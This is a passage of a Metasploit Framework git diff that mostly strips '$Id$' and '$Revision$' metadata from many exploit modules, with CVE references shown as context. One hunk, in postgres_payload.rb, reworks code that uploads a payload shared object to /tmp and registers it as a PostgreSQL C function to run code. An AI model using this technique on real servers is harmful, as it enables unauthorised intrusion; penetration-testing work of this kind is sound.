Msf::Exploit::Remote and could allow exploitation in semi-reasonable amount of time. }, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-4221'], diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 2531bd8ce5..8b357d9f39 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'onetwo' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0608'], diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 1d93099d9a..dd80800e1f 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '40521' ], diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index ca5136397e..1e2ff45fc4 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'gat3way', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2765' ], diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 0dacd263fd..786989bff5 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Yann Senotier ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1388' ], diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index dbfdd9d141..ab6a11aa53 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Raphael Rigo ', 'Julien Tinnes ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2799'], diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index d07d82be9d..26a9d84bb5 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1148'], diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index e2501f3a79..d87027cadb 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # Default password diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 610c3dda19..673db6bc4f 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'EDB', '17487' ], [ 'URL', 'http://www.webidsupport.com/forums/showthread.php?3892' ] ], - 'Version' => '$Revision$', 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 731b59e1cb..c1840dcc11 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Brendan Coles ', # Discovery and exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index dfd96782da..06b05869f3 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'KaiJern Lau ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-3252'], diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index fe683d76fb..b51409b501 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0284' ], diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index c2b40605ef..f83ab68a01 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -57,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Laurent Butti <0x9090 at gmail.com>' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6332'], diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index 7e94afe2ca..fe6bcb3d62 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -41,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '71362'], diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 43b4d71038..2853947ced 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #(Phenoelit) 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index d03c95e781..2b02a36531 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ require 'msf/core' GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten. }, - 'Version' => '$Revision$', 'Author' => [ 'patrick' ], 'Arch' => ARCH_X86, 'Platform' => 'linux', diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index d26a2c9946..47a4d023ea 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5208' ], diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index 848dce9c93..4f7ff8799f 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index c126663890..923f55b27c 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 501ba4350e..99a7ccd5a0 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index f4ebe8a5d4..4de10b35a2 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index 89bf39cafb..29ccfd9b54 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0917' ], diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index 164ecf5658..fd38166282 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0404' ], diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index fcd1b00bf4..9735c19234 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4484' ], diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index 15a1e8a9f3..744e4b6d57 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0226' ], diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index a4f5c54135..6b1f381c96 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'bannedit', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2502' ], diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index e28984d5d8..e64feb9b34 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -1,7 +1,3 @@ -### -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'todb' # original windows module this is based on ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ] @@ -66,17 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote deregister_options('SQL', 'RETURN_ROWSET') end - # Buncha stuff to make typing easier. - def username; datastore['USERNAME']; end - def password; datastore['PASSWORD']; end - def database; datastore['DATABASE']; end - def rhost; datastore['rhost']; end - def rport; datastore['rport']; end - def verbose; datastore['VERBOSE']; end - def bits; datastore['BITS'];end + def check + version = postgres_fingerprint - def execute_command(cmd, opts) - postgres_sys_exec(cmd) + if version[:auth] + return CheckCode::Vulnerable + else + print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + return CheckCode::Safe + end end def exploit @@ -89,28 +82,27 @@ class Metasploit3 < Msf::Exploit::Remote end fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so" - tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname) - unless tbl && fld && so && oid + unless postgres_upload_binary_data(payload_so(fname), fname) print_error "Could not upload the UDF SO" return end - print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})" + print_status "Uploaded as #{fname}, should be cleaned up automatically" begin func_name = Rex::Text.rand_text_alpha(10) postgres_query( "create or replace function pg_temp.#{func_name}()"+ - " returns void as '#{so}','#{func_name}'"+ - " language 'C' strict immutable" + " returns void as '#{fname}','#{func_name}'"+ + " language c strict immutable" ) - rescue + rescue RuntimeError => e + print_error "Failed to create UDF function: #{e.class}: #{e}" end postgres_logout if @postgres_conn end - # Authenticate to the postgres server. # # Returns the version from #postgres_fingerprint @@ -132,6 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote ) return result[:auth] else + print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") return :noauth end rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index bb94e4380c..9f4968e534 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0213'], diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index 0ea4fd9f5f..39d9cb273f 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote defined length. Props to iDEFENSE for the advisory. }, 'Author' => 'skape', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0541'], diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index e35da0cbb7..37566faa9d 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -49,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2063' ], diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 4cc64a421e..bd903892bf 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index a141e9a0a5..5ed46e581c 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 61e982f420..9ff787e252 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, { 'Name' => 'F5 BIG-IP SSH Private Key Exposure', - 'Version' => '$Revision$', 'Description' => %q{ F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index b6075a2ea3..606e6c901f 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Simon Berry-Byrne ', # Author / Publisher / Original exploit 'hdm', # Metasploit conversion ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2009-2477'], diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 0598e338e6..87a0261347 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0295'], diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index a96cbc05a4..077b0b9b8b 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Will Drewry ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0950' ], diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index b14cc13cb6..6ca8e97f5f 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', 'hdm' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5353' ], diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index bcd8d6d9c8..63f65c2b39 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'kf', # Original PoC/exploit 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3867' ], diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index b95eed7af3..c3020043fb 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matthias Kaiser', # PoC 'egypt' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0094' ], diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 24440485a4..a914ff59f8 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3869' ], diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 53eab16fcc..dc01bdc41a 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'natron' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ], diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index ab788a628b..5075220eb9 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matthias Kaiser', # PoC 'egypt' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0840' ], diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index d47a6df167..e5d6f0fc81 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'Aviv Raff '], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2265'], diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index 4a3f5e70a3..66dd676e5f 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3677'], diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 435f9e5170..f0e9534b78 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'egypt', # stolen from mpack ], - 'Version' => '$Revision$', 